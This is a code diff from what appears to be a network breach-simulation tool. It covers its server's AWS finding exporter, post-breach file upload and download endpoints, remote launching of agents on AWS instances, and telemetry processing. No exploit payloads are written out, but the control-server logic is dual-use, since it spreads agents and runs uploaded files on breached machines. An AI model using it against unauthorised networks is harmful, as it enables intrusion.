description="Change {0} password to a complex one-use password that is not shared with other computers on the network. Update your Samba server to 4.4.14 and up, 4.5.10 and up, or 4.6.4 and up." \
|
||||||
|
.format(issue['username']),
|
||||||
|
recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB protocol with user {2} and its password, and used the SambaCry vulnerability.".format(
|
||||||
|
issue['machine'], issue['ip_address'], issue['username']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_smb_pth_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=5,
|
||||||
|
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
|
||||||
|
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
|
||||||
|
issue['username']),
|
||||||
|
recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over SMB protocol with user {2}.".format(
|
||||||
|
issue['machine'], issue['ip_address'], issue['username']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_ssh_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
|
||||||
|
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
|
||||||
|
issue['username']),
|
||||||
|
recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with user {2} and its password.".format(
|
||||||
|
issue['machine'], issue['ip_address'], issue['username']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_ssh_key_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
|
||||||
|
description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']),
|
||||||
|
recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with private key {ssh_key}.".format(
|
||||||
|
machine=issue['machine'], ip_address=issue['ip_address'], ssh_key=issue['ssh_key']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_elastic_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=10,
|
||||||
|
title="Elastic Search servers are vulnerable to CVE-2015-1427",
|
||||||
|
description="Update your Elastic Search server to version 1.4.3 and up.",
|
||||||
|
recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.".format(
|
||||||
|
issue['machine'], issue['ip_address']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_island_cross_segment_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Weak segmentation - Machines from different segments are able to communicate.",
|
||||||
|
description="Segment your network and make sure there is no communication between machines from different segments.",
|
||||||
|
recommendation="The network can probably be segmented. A monkey instance on \
|
||||||
|
{0} in the networks {1} \
|
||||||
|
could directly access the Monkey Island server in the networks {2}.".format(issue['machine'],
|
||||||
|
issue['networks'],
|
||||||
|
issue['server_networks']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_shared_passwords_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Multiple users have the same password",
|
||||||
|
description="Some users are sharing passwords, this should be fixed by changing passwords.",
|
||||||
|
recommendation="These users are sharing access password: {0}.".format(issue['shared_with']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_shellshock_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=10,
|
||||||
|
title="Machines are vulnerable to 'Shellshock'",
|
||||||
|
description="Update your Bash to a ShellShock-patched version.",
|
||||||
|
recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
|
||||||
|
"The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a shell injection attack on the paths: {3}.".format(
|
||||||
|
issue['machine'], issue['ip_address'], issue['port'], issue['paths']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_smb_password_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
|
||||||
|
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
|
||||||
|
issue['username']),
|
||||||
|
recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB protocol with user {2} and its password.".format(
|
||||||
|
issue['machine'], issue['ip_address'], issue['username']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_wmi_password_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
|
||||||
|
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.",
|
||||||
|
recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over the WMI protocol with user {username} and its password.".format(
|
||||||
|
machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_wmi_pth_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
|
||||||
|
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
|
||||||
|
issue['username']),
|
||||||
|
recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a pass-the-hash attack over WMI protocol with user {username}".format(
|
||||||
|
machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_rdp_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
|
||||||
|
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
|
||||||
|
issue['username']),
|
||||||
|
recommendation="The machine machine ({ip_address}) is vulnerable to a RDP attack. The Monkey authenticated over the RDP protocol with user {username} and its password.".format(
|
||||||
|
machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_shared_passwords_domain_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Multiple users have the same password.",
|
||||||
|
description="Some domain users are sharing passwords, this should be fixed by changing passwords.",
|
||||||
|
recommendation="These users are sharing access password: {shared_with}.".format(
|
||||||
|
shared_with=issue['shared_with']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_shared_admins_domain_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Shared local administrator account - Different machines have the same account as a local administrator.",
|
||||||
|
description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t an unintentional local admin sharing.",
|
||||||
|
recommendation="Here is a list of machines which the account {username} is defined as an administrator: {shared_machines}".format(
|
||||||
|
username=issue['username'], shared_machines=issue['shared_machines']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_strong_users_on_crit_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=1,
|
||||||
|
title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.",
|
||||||
|
description="This critical machine is open to attacks via strong users with access to it.",
|
||||||
|
recommendation="The services: {services} have been found on the machine thus classifying it as a critical machine. These users has access to it:{threatening_users}.".format(
|
||||||
|
services=issue['services'], threatening_users=issue['threatening_users']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_struts2_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=10,
|
||||||
|
title="Struts2 servers are vulnerable to remote code execution.",
|
||||||
|
description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
|
||||||
|
recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
|
||||||
|
" The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser.".format(
|
||||||
|
machine=issue['machine'], ip_address=issue['ip_address']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_weblogic_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=10,
|
||||||
|
title="Oracle WebLogic servers are vulnerable to remote code execution.",
|
||||||
|
description="Install Oracle critical patch updates. Or update to the latest version. " \
|
||||||
|
"Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.",
|
||||||
|
recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
|
||||||
|
" The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware (subcomponent: WLS Security).".format(
|
||||||
|
machine=issue['machine'], ip_address=issue['ip_address']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_hadoop_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=10,
|
||||||
|
title="Hadoop/Yarn servers are vulnerable to remote code execution.",
|
||||||
|
description="Run Hadoop in secure mode, add Kerberos authentication.",
|
||||||
|
recommendation="The Hadoop server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
|
||||||
|
"The attack was made possible due to default Hadoop/Yarn configuration being insecure.",
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
|
@ -0,0 +1,7 @@
|
||||||
|
class Exporter(object):
|
||||||
|
def __init__(self):
|
||||||
|
pass
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def handle_report(report_json):
|
||||||
|
raise NotImplementedError
|
|
@ -0,0 +1,24 @@
|
||||||
|
import json
|
||||||
|
|
||||||
|
import flask_restful
|
||||||
|
from flask import request, jsonify, abort
|
||||||
|
|
||||||
|
from cc.auth import jwt_required
|
||||||
|
from cc.services.config import ConfigService
|
||||||
|
|
||||||
|
|
||||||
|
class IslandConfiguration(flask_restful.Resource):
|
||||||
|
@jwt_required()
|
||||||
|
def get(self):
|
||||||
|
return jsonify(schema=ConfigService.get_config_schema(),
|
||||||
|
configuration=ConfigService.get_config(False, True, True))
|
||||||
|
|
||||||
|
@jwt_required()
|
||||||
|
def post(self):
|
||||||
|
config_json = json.loads(request.data)
|
||||||
|
if 'reset' in config_json:
|
||||||
|
ConfigService.reset_config()
|
||||||
|
else:
|
||||||
|
if not ConfigService.update_config(config_json, should_encrypt=True):
|
||||||
|
abort(400)
|
||||||
|
return self.get()
|
|
@ -0,0 +1,14 @@
|
||||||
|
import flask_restful
|
||||||
|
from flask import send_from_directory
|
||||||
|
from cc.resources.pba_file_upload import GET_FILE_DIR
|
||||||
|
|
||||||
|
__author__ = 'VakarisZ'
|
||||||
|
|
||||||
|
|
||||||
|
class PBAFileDownload(flask_restful.Resource):
|
||||||
|
"""
|
||||||
|
File download endpoint used by monkey to download user's PBA file
|
||||||
|
"""
|
||||||
|
# Used by monkey. can't secure.
|
||||||
|
def get(self, path):
|
||||||
|
return send_from_directory(GET_FILE_DIR, path)
|
|
@ -0,0 +1,83 @@
|
||||||
|
import flask_restful
|
||||||
|
from flask import request, send_from_directory, Response
|
||||||
|
from cc.services.config import ConfigService
|
||||||
|
from cc.services.post_breach_files import PBA_WINDOWS_FILENAME_PATH, PBA_LINUX_FILENAME_PATH, UPLOADS_DIR
|
||||||
|
from cc.auth import jwt_required
|
||||||
|
import os
|
||||||
|
from werkzeug.utils import secure_filename
|
||||||
|
import logging
|
||||||
|
import copy
|
||||||
|
|
||||||
|
__author__ = 'VakarisZ'
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
GET_FILE_DIR = "./userUploads"
|
||||||
|
# Front end uses these strings to identify which files to work with (linux of windows)
|
||||||
|
LINUX_PBA_TYPE = 'PBAlinux'
|
||||||
|
WINDOWS_PBA_TYPE = 'PBAwindows'
|
||||||
|
|
||||||
|
|
||||||
|
class FileUpload(flask_restful.Resource):
|
||||||
|
"""
|
||||||
|
File upload endpoint used to exchange files with filepond component on the front-end
|
||||||
|
"""
|
||||||
|
@jwt_required()
|
||||||
|
def get(self, file_type):
|
||||||
|
"""
|
||||||
|
Sends file to filepond
|
||||||
|
:param file_type: Type indicates which file to send, linux or windows
|
||||||
|
:return: Returns file contents
|
||||||
|
"""
|
||||||
|
# Verify that file_name is indeed a file from config
|
||||||
|
if file_type == LINUX_PBA_TYPE:
|
||||||
|
filename = ConfigService.get_config_value(copy.deepcopy(PBA_LINUX_FILENAME_PATH))
|
||||||
|
else:
|
||||||
|
filename = ConfigService.get_config_value(copy.deepcopy(PBA_WINDOWS_FILENAME_PATH))
|
||||||
|
return send_from_directory(GET_FILE_DIR, filename)
|
||||||
|
|
||||||
|
@jwt_required()
|
||||||
|
def post(self, file_type):
|
||||||
|
"""
|
||||||
|
Receives user's uploaded file from filepond
|
||||||
|
:param file_type: Type indicates which file was received, linux or windows
|
||||||
|
:return: Returns flask response object with uploaded file's filename
|
||||||
|
"""
|
||||||
|
filename = FileUpload.upload_pba_file(request, (file_type == LINUX_PBA_TYPE))
|
||||||
|
|
||||||
|
response = Response(
|
||||||
|
response=filename,
|
||||||
|
status=200, mimetype='text/plain')
|
||||||
|
return response
|
||||||
|
|
||||||
|
@jwt_required()
|
||||||
|
def delete(self, file_type):
|
||||||
|
"""
|
||||||
|
Deletes file that has been deleted on the front end
|
||||||
|
:param file_type: Type indicates which file was deleted, linux of windows
|
||||||
|
:return: Empty response
|
||||||
|
"""
|
||||||
|
filename_path = PBA_LINUX_FILENAME_PATH if file_type == 'PBAlinux' else PBA_WINDOWS_FILENAME_PATH
|
||||||
|
filename = ConfigService.get_config_value(filename_path)
|
||||||
|
file_path = os.path.join(UPLOADS_DIR, filename)
|
||||||
|
try:
|
||||||
|
if os.path.exists(file_path):
|
||||||
|
os.remove(file_path)
|
||||||
|
ConfigService.set_config_value(filename_path, '')
|
||||||
|
except OSError as e:
|
||||||
|
LOG.error("Can't remove previously uploaded post breach files: %s" % e)
|
||||||
|
|
||||||
|
return {}
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def upload_pba_file(request_, is_linux=True):
|
||||||
|
"""
|
||||||
|
Uploads PBA file to island's file system
|
||||||
|
:param request_: Request object containing PBA file
|
||||||
|
:param is_linux: Boolean indicating if this file is for windows or for linux
|
||||||
|
:return: filename string
|
||||||
|
"""
|
||||||
|
filename = secure_filename(request_.files['filepond'].filename)
|
||||||
|
file_path = os.path.join(UPLOADS_DIR, filename)
|
||||||
|
request_.files['filepond'].save(file_path)
|
||||||
|
ConfigService.set_config_value((PBA_LINUX_FILENAME_PATH if is_linux else PBA_WINDOWS_FILENAME_PATH), filename)
|
||||||
|
return filename
|
|
@ -0,0 +1,48 @@
|
||||||
|
import json
|
||||||
|
from flask import request, jsonify, make_response
|
||||||
|
import flask_restful
|
||||||
|
|
||||||
|
from cc.auth import jwt_required
|
||||||
|
from cc.services.remote_run_aws import RemoteRunAwsService
|
||||||
|
from common.cloud.aws_service import AwsService
|
||||||
|
|
||||||
|
|
||||||
|
class RemoteRun(flask_restful.Resource):
|
||||||
|
def __init__(self):
|
||||||
|
super(RemoteRun, self).__init__()
|
||||||
|
RemoteRunAwsService.init()
|
||||||
|
|
||||||
|
def run_aws_monkeys(self, request_body):
|
||||||
|
instances = request_body.get('instances')
|
||||||
|
island_ip = request_body.get('island_ip')
|
||||||
|
return RemoteRunAwsService.run_aws_monkeys(instances, island_ip)
|
||||||
|
|
||||||
|
@jwt_required()
|
||||||
|
def get(self):
|
||||||
|
action = request.args.get('action')
|
||||||
|
if action == 'list_aws':
|
||||||
|
is_aws = RemoteRunAwsService.is_running_on_aws()
|
||||||
|
resp = {'is_aws': is_aws}
|
||||||
|
if is_aws:
|
||||||
|
is_auth = RemoteRunAwsService.update_aws_auth_params()
|
||||||
|
resp['auth'] = is_auth
|
||||||
|
if is_auth:
|
||||||
|
resp['instances'] = AwsService.get_instances()
|
||||||
|
return jsonify(resp)
|
||||||
|
|
||||||
|
return {}
|
||||||
|
|
||||||
|
@jwt_required()
|
||||||
|
def post(self):
|
||||||
|
body = json.loads(request.data)
|
||||||
|
resp = {}
|
||||||
|
if body.get('type') == 'aws':
|
||||||
|
is_auth = RemoteRunAwsService.update_aws_auth_params()
|
||||||
|
resp['auth'] = is_auth
|
||||||
|
if is_auth:
|
||||||
|
result = self.run_aws_monkeys(body)
|
||||||
|
resp['result'] = result
|
||||||
|
return jsonify(resp)
|
||||||
|
|
||||||
|
# default action
|
||||||
|
return make_response({'error': 'Invalid action'}, 500)
|
|
@ -10,6 +10,7 @@ from cc.services.config import ConfigService
|
||||||
from cc.services.node import NodeService
|
from cc.services.node import NodeService
|
||||||
from cc.services.report import ReportService
|
from cc.services.report import ReportService
|
||||||
from cc.utils import local_ip_addresses
|
from cc.utils import local_ip_addresses
|
||||||
|
from cc.services.post_breach_files import remove_PBA_files
|
||||||
|
|
||||||
__author__ = 'Barak'
|
__author__ = 'Barak'
|
||||||
|
|
||||||
|
@ -42,6 +43,7 @@ class Root(flask_restful.Resource):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
@jwt_required()
|
@jwt_required()
|
||||||
def reset_db():
|
def reset_db():
|
||||||
|
remove_PBA_files()
|
||||||
# We can't drop system collections.
|
# We can't drop system collections.
|
||||||
[mongo.db[x].drop() for x in mongo.db.collection_names() if not x.startswith('system.')]
|
[mongo.db[x].drop() for x in mongo.db.collection_names() if not x.startswith('system.')]
|
||||||
ConfigService.init_config()
|
ConfigService.init_config()
|
||||||
|
@ -65,5 +67,7 @@ class Root(flask_restful.Resource):
|
||||||
if not infection_done:
|
if not infection_done:
|
||||||
report_done = False
|
report_done = False
|
||||||
else:
|
else:
|
||||||
|
if is_any_exists:
|
||||||
|
ReportService.get_report()
|
||||||
report_done = ReportService.is_report_generated()
|
report_done = ReportService.is_report_generated()
|
||||||
return dict(run_server=True, run_monkey=is_any_exists, infection_done=infection_done, report_done=report_done)
|
return dict(run_server=True, run_monkey=is_any_exists, infection_done=infection_done, report_done=report_done)
|
||||||
|
|
|
@ -90,10 +90,11 @@ class Telemetry(flask_restful.Resource):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_edge_by_scan_or_exploit_telemetry(telemetry_json):
|
def get_edge_by_scan_or_exploit_telemetry(telemetry_json):
|
||||||
dst_ip = telemetry_json['data']['machine']['ip_addr']
|
dst_ip = telemetry_json['data']['machine']['ip_addr']
|
||||||
|
dst_domain_name = telemetry_json['data']['machine']['domain_name']
|
||||||
src_monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
|
src_monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
|
||||||
dst_node = NodeService.get_monkey_by_ip(dst_ip)
|
dst_node = NodeService.get_monkey_by_ip(dst_ip)
|
||||||
if dst_node is None:
|
if dst_node is None:
|
||||||
dst_node = NodeService.get_or_create_node(dst_ip)
|
dst_node = NodeService.get_or_create_node(dst_ip, dst_domain_name)
|
||||||
|
|
||||||
return EdgeService.get_or_create_edge(src_monkey["_id"], dst_node["_id"])
|
return EdgeService.get_or_create_edge(src_monkey["_id"], dst_node["_id"])
|
||||||
|
|
||||||
|
@ -144,30 +145,29 @@ class Telemetry(flask_restful.Resource):
|
||||||
edge = Telemetry.get_edge_by_scan_or_exploit_telemetry(telemetry_json)
|
edge = Telemetry.get_edge_by_scan_or_exploit_telemetry(telemetry_json)
|
||||||
data = copy.deepcopy(telemetry_json['data']['machine'])
|
data = copy.deepcopy(telemetry_json['data']['machine'])
|
||||||
ip_address = data.pop("ip_addr")
|
ip_address = data.pop("ip_addr")
|
||||||
|
domain_name = data.pop("domain_name")
|
||||||
new_scan = \
|
new_scan = \
|
||||||
{
|
{
|
||||||
"timestamp": telemetry_json["timestamp"],
|
"timestamp": telemetry_json["timestamp"],
|
||||||
"data": data,
|
"data": data
|
||||||
"scanner": telemetry_json['data']['scanner']
|
|
||||||
}
|
}
|
||||||
mongo.db.edge.update(
|
mongo.db.edge.update(
|
||||||
{"_id": edge["_id"]},
|
{"_id": edge["_id"]},
|
||||||
{"$push": {"scans": new_scan},
|
{"$push": {"scans": new_scan},
|
||||||
"$set": {"ip_address": ip_address}}
|
"$set": {"ip_address": ip_address, 'domain_name': domain_name}}
|
||||||
)
|
)
|
||||||
|
|
||||||
node = mongo.db.node.find_one({"_id": edge["to"]})
|
node = mongo.db.node.find_one({"_id": edge["to"]})
|
||||||
if node is not None:
|
if node is not None:
|
||||||
if new_scan["scanner"] == "TcpScanner":
|
scan_os = new_scan["data"]["os"]
|
||||||
scan_os = new_scan["data"]["os"]
|
if "type" in scan_os:
|
||||||
if "type" in scan_os:
|
mongo.db.node.update({"_id": node["_id"]},
|
||||||
mongo.db.node.update({"_id": node["_id"]},
|
{"$set": {"os.type": scan_os["type"]}},
|
||||||
{"$set": {"os.type": scan_os["type"]}},
|
upsert=False)
|
||||||
upsert=False)
|
if "version" in scan_os:
|
||||||
if "version" in scan_os:
|
mongo.db.node.update({"_id": node["_id"]},
|
||||||
mongo.db.node.update({"_id": node["_id"]},
|
{"$set": {"os.version": scan_os["version"]}},
|
||||||
{"$set": {"os.version": scan_os["version"]}},
|
upsert=False)
|
||||||
upsert=False)
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def process_system_info_telemetry(telemetry_json):
|
def process_system_info_telemetry(telemetry_json):
|
||||||
|
@ -191,6 +191,10 @@ class Telemetry(flask_restful.Resource):
|
||||||
if 'wmi' in telemetry_json['data']:
|
if 'wmi' in telemetry_json['data']:
|
||||||
wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
|
wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
|
||||||
wmi_handler.process_and_handle_wmi_info()
|
wmi_handler.process_and_handle_wmi_info()
|
||||||
|
if 'aws' in telemetry_json['data']:
|
||||||
|
if 'instance_id' in telemetry_json['data']['aws']:
|
||||||
|
mongo.db.monkey.update_one({'_id': monkey_id},
|
||||||
|
{'$set': {'aws_instance_id': telemetry_json['data']['aws']['instance_id']}})
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def add_ip_to_ssh_keys(ip, ssh_info):
|
def add_ip_to_ssh_keys(ip, ssh_info):
|
||||||
|
@ -253,6 +257,11 @@ class Telemetry(flask_restful.Resource):
|
||||||
if len(credential) > 0:
|
if len(credential) > 0:
|
||||||
attempts[i][field] = encryptor.enc(credential.encode('utf-8'))
|
attempts[i][field] = encryptor.enc(credential.encode('utf-8'))
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def process_post_breach_telemetry(telemetry_json):
|
||||||
|
mongo.db.monkey.update(
|
||||||
|
{'guid': telemetry_json['monkey_guid']},
|
||||||
|
{'$push': {'pba_results': telemetry_json['data']}})
|
||||||
|
|
||||||
TELEM_PROCESS_DICT = \
|
TELEM_PROCESS_DICT = \
|
||||||
{
|
{
|
||||||
|
@ -261,5 +270,6 @@ TELEM_PROCESS_DICT = \
|
||||||
'exploit': Telemetry.process_exploit_telemetry,
|
'exploit': Telemetry.process_exploit_telemetry,
|
||||||
'scan': Telemetry.process_scan_telemetry,
|
'scan': Telemetry.process_scan_telemetry,
|
||||||
'system_info_collection': Telemetry.process_system_info_telemetry,
|
'system_info_collection': Telemetry.process_system_info_telemetry,
|
||||||
'trace': Telemetry.process_trace_telemetry
|
'trace': Telemetry.process_trace_telemetry,
|
||||||
|
'post_breach': Telemetry.process_post_breach_telemetry
|
||||||
}
|
}
|
||||||
|
|
|
@ -31,11 +31,13 @@ class TelemetryFeed(flask_restful.Resource):
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_displayed_telemetry(telem):
|
def get_displayed_telemetry(telem):
|
||||||
|
monkey = NodeService.get_monkey_by_guid(telem['monkey_guid'])
|
||||||
|
default_hostname = "GUID-" + telem['monkey_guid']
|
||||||
return \
|
return \
|
||||||
{
|
{
|
||||||
'id': telem['_id'],
|
'id': telem['_id'],
|
||||||
'timestamp': telem['timestamp'].strftime('%d/%m/%Y %H:%M:%S'),
|
'timestamp': telem['timestamp'].strftime('%d/%m/%Y %H:%M:%S'),
|
||||||
'hostname': NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname'],
|
'hostname': monkey.get('hostname', default_hostname) if monkey else default_hostname,
|
||||||
'brief': TELEM_PROCESS_DICT[telem['telem_type']](telem)
|
'brief': TELEM_PROCESS_DICT[telem['telem_type']](telem)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -52,7 +54,7 @@ class TelemetryFeed(flask_restful.Resource):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_state_telem_brief(telem):
|
def get_state_telem_brief(telem):
|
||||||
if telem['data']['done']:
|
if telem['data']['done']:
|
||||||
return 'Monkey died.'
|
return '''Monkey finishing it's execution.'''
|
||||||
else:
|
else:
|
||||||
return 'Monkey started.'
|
return 'Monkey started.'
|
||||||
|
|
||||||
|
@ -78,6 +80,12 @@ class TelemetryFeed(flask_restful.Resource):
|
||||||
def get_trace_telem_brief(telem):
|
def get_trace_telem_brief(telem):
|
||||||
return 'Monkey reached max depth.'
|
return 'Monkey reached max depth.'
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_post_breach_telem_brief(telem):
|
||||||
|
return '%s post breach action executed on %s (%s) machine' % (telem['data']['name'],
|
||||||
|
telem['data']['hostname'],
|
||||||
|
telem['data']['ip'])
|
||||||
|
|
||||||
|
|
||||||
TELEM_PROCESS_DICT = \
|
TELEM_PROCESS_DICT = \
|
||||||
{
|
{
|
||||||
|
@ -86,5 +94,6 @@ TELEM_PROCESS_DICT = \
|
||||||
'exploit': TelemetryFeed.get_exploit_telem_brief,
|
'exploit': TelemetryFeed.get_exploit_telem_brief,
|
||||||
'scan': TelemetryFeed.get_scan_telem_brief,
|
'scan': TelemetryFeed.get_scan_telem_brief,
|
||||||
'system_info_collection': TelemetryFeed.get_systeminfo_telem_brief,
|
'system_info_collection': TelemetryFeed.get_systeminfo_telem_brief,
|
||||||
'trace': TelemetryFeed.get_trace_telem_brief
|
'trace': TelemetryFeed.get_trace_telem_brief,
|
||||||
|
'post_breach': TelemetryFeed.get_post_breach_telem_brief
|
||||||
}
|
}
|
||||||
|
|
|
@ -0,0 +1 @@
